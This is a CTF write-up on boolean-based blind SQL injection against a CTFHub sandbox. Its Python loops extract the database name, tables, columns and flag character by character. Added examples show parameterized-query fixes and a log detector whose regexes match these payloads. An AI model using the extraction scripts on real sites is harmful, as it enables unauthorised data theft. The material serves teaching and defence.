CTFHub - SQL boolean-based blind injection
2022-06-11 17:46:00 【榴莲 蛋挞】
Open the challenge URL and first submit:
1 and length(database())>3, which returns:

Then submit:
1 and length(database())<3, which returns:

The two responses differ, which shows the id parameter can be exploited with boolean-based blind injection.
First get the name of the current database (the script below extracts database() one character at a time):
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
# Character positions 1..4 of the database name.
for j in range(1, 5):
    # Candidate ASCII codes 43..125 for this position.
    for i in range(43, 126):
        ss = "?id=1 and ascii(substr(database()," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        # The page only echoes "query_success" when the injected condition is true.
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
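The oracle the script above relies on is that the page answers "query_success" only when the injected condition holds. The following is an added example, not code from the writeup or the challenge: it rebuilds a toy version of the `?id=` endpoint with Python's built-in sqlite3 (MySQL's `database()` is replaced by the constructed literal `'sqli'`), shows the same two probes distinguishing true from false against the concatenated query, and shows that parameter binding, with or without an explicit integer check, removes the oracle. The table, rows and function names are all assumptions made for this demonstration.

```python
import sqlite3

# Constructed stand-in for the challenge backend: one table looked up by id.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
conn.execute("INSERT INTO news VALUES (1, 'hello')")
conn.commit()

# The writeup's two probes, with the literal 'sqli' standing in for database()
# because sqlite has no database() function (constructed for this example).
PROBES = ("1 and length('sqli')>3", "1 and length('sqli')<3")


def lookup_vulnerable(id_param: str) -> str:
    """String-concatenated query: the injected 'and ...' becomes part of the WHERE clause,
    so the row is returned only when the attacker's condition is true."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    row = conn.execute(sql).fetchone()
    return "query_success" if row else "query_fail"


def lookup_bound_only(id_param: str) -> str:
    """Same lookup with a bound parameter and no other change: the whole string is
    compared against the id column as a value, so 'and ...' is never parsed as SQL."""
    row = conn.execute("SELECT title FROM news WHERE id=?", (id_param,)).fetchone()
    return "query_success" if row else "query_fail"


def lookup_hardened(id_param: str) -> str:
    """Binding plus input typing: an id must be an unsigned integer, anything else is rejected
    before it reaches the database."""
    if not id_param.isdigit():
        return "query_fail"
    row = conn.execute("SELECT title FROM news WHERE id=?", (int(id_param),)).fetchone()
    return "query_success" if row else "query_fail"


def probe(lookup) -> tuple:
    """Run both probes through a lookup function; a usable oracle yields two different answers."""
    return tuple(lookup(p) for p in PROBES)


if __name__ == "__main__":
    print("vulnerable:", probe(lookup_vulnerable))   # ('query_success', 'query_fail')
    print("bound only:", probe(lookup_bound_only))   # ('query_fail', 'query_fail')
    print("hardened:  ", probe(lookup_hardened))     # ('query_fail', 'query_fail')
```

The vulnerable function answers the two probes differently, which is exactly the one bit per request the writeup's loops collect. Both fixed variants answer "query_fail" to both probes and still serve the legitimate request `id=1`, so the response no longer depends on anything the client injects.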
Next, get the names of the tables in the current database, using the template:
?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),j,1))=i
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
# Character positions 1..9 of the comma-separated table list.
for j in range(1, 10):
    # Candidate ASCII codes 43..125 for this position.
    for i in range(43, 126):
        ss = "?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli')," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        # The page only echoes "query_success" when the injected condition is true.
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
Result:

Next, list the columns of the flag table, using the template:
?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),j,1))=i
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
# Character positions 1..9 of the comma-separated column list.
for j in range(1, 10):
    # Candidate ASCII codes 43..125 for this position.
    for i in range(43, 126):
        ss = "?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag')," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        # The page only echoes "query_success" when the injected condition is true.
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
Result:

Finally, read the contents of the flag column of the flag table, using the template:
?id=1 and ascii(substr((select flag from flag),j,1))=i
```python
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
# Character positions 1..39 of the flag value.
for j in range(1, 40):
    # Candidate ASCII codes 43..125 for this position.
    for i in range(43, 126):
        ss = "?id=1 and ascii(substr((select flag from flag)," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        # The page only echoes "query_success" when the injected condition is true.
        if "query_success" in pa:
            st += chr(i)
            break
print(st)
```
Result:
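Every step of this writeup has the same shape on the server side: a numeric id parameter carrying `and ascii(substr(...))=N`, repeated dozens of times per extracted character from one client. That shape is easy to spot in web server logs. The following is an added example, not part of the writeup: it parses constructed Apache/Nginx combined-style access-log lines (addresses and timestamps are made up), URL-decodes the id parameter, flags the indicators seen in this challenge (non-numeric id, `and length(`, `ascii(substr(`, `information_schema`, a subselect), and counts flagged requests per client so the enumeration burst itself stands out. The log format, indicator names and threshold are assumptions made for this example.

```python
from __future__ import annotations
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample log: two normal requests from 10.0.0.5 and four probes from
# 10.0.0.9 that mirror the payload shapes used in the writeup (URL-encoded as a
# client such as requests would send them).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jun/2022:17:40:01 +0800] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [11/Jun/2022:17:40:02 +0800] "GET /?id=2 HTTP/1.1" 200 498
10.0.0.9 - - [11/Jun/2022:17:41:10 +0800] "GET /?id=1%20and%20length(database())%3E3 HTTP/1.1" 200 512
10.0.0.9 - - [11/Jun/2022:17:41:11 +0800] "GET /?id=1%20and%20ascii(substr(database(),1,1))%3D115 HTTP/1.1" 200 512
10.0.0.9 - - [11/Jun/2022:17:41:11 +0800] "GET /?id=1%20and%20ascii(substr(database(),1,1))%3D116 HTTP/1.1" 200 470
10.0.0.9 - - [11/Jun/2022:17:41:12 +0800] "GET /?id=1%20and%20ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3D'sqli'),1,1))%3D102 HTTP/1.1" 200 512
"""

# Combined-style access log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators matched against the URL-decoded id value (names are this example's own).
INDICATORS = {
    "and_length_probe": re.compile(r"\band\s+length\s*\(", re.I),       # length(database())>3 style probes
    "ascii_substr": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),    # per-character extraction
    "information_schema": re.compile(r"\binformation_schema\b", re.I),  # schema enumeration
    "subselect": re.compile(r"\(\s*select\b", re.I),                    # nested query in a numeric field
}


def inspect_id(value: str) -> list[str]:
    """Return the indicator names that fire for one id value (empty list = clean)."""
    hits = []
    if not value.strip().isdigit():
        hits.append("non_numeric_id")  # a numeric id should never contain anything else
    for name, pattern in INDICATORS.items():
        if pattern.search(value):
            hits.append(name)
    return hits


def analyze(log_text: str) -> tuple[list[dict], Counter]:
    """Parse log lines, flag suspicious id values, and count flagged requests per client."""
    flagged = []
    per_client: Counter = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in params.get("id", []):  # parse_qs already URL-decodes the value
            hits = inspect_id(value)
            if hits:
                flagged.append({"ip": m["ip"], "ts": m["ts"], "id": value, "indicators": hits})
                per_client[m["ip"]] += 1
    return flagged, per_client


def noisy_clients(per_client: Counter, threshold: int = 3) -> list[str]:
    """Clients with at least `threshold` flagged requests; blind extraction needs
    many requests per character, so the count is a signal on its own."""
    return sorted(ip for ip, n in per_client.items() if n >= threshold)


if __name__ == "__main__":
    events, counts = analyze(SAMPLE_LOG)
    for e in events:
        print(e["ip"], e["ts"], e["indicators"], e["id"][:60])
    print("noisy clients:", noisy_clients(counts))
```

The per-request indicators catch the payload shape; the per-client counter catches the volume, since the loops above issue up to 83 requests for each character they recover. In a real deployment the same checks can feed a WAF rule or a SIEM correlation on the request count, but the durable fix is the one from the earlier example: bind the parameter and type it as an integer, so the oracle disappears regardless of what the logs show.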